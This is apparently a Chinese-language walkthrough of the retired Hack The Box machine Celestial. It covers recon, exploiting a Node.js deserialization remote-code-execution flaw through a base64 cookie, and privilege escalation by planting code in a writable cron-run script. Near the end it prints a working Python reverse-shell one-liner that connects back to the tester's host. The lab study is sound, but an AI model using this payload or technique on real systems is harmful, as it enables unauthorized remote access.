HTB-靶机-Celestial

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.85

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.85 -o ./Celestial-autorecon

就开了个3000端口，访问看看

再刷新一下看到上面信息，看下burpsuite的请求信息

发现base64编码信息，解码一下得到上述明文，随便改个数字3在burpsuite上配置编码为base64得到如下报错信息

看显示是跟nodejs有关，搜索了下对应名称是否含有漏洞，确认存在反序列化远程代码执行漏洞，参考链接：https://help.aliyun.com/knowledge_detail/50422.html  再搜索下exploit ，具体exploit地址：https://hd7exploit.wordpress.com/2017/05/29/exploiting-node-js-deserialization-bug-for-remote-code-execution-cve-2017-5941/

exploit代码：

https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py

具体操作如下：

成功反弹shell，获取了user.txt信息，尝试提权，执行了sudo -l需要无果，看到当前目录含有一个脚本

显示脚本是在运行，下载pspy到目标靶机执行得到如下结果

确认文件script.py可以写入文件，使用vi编辑器写入反弹代码

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.5",8844));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

等待反弹shell，差不多等了5-10分钟成功反弹shell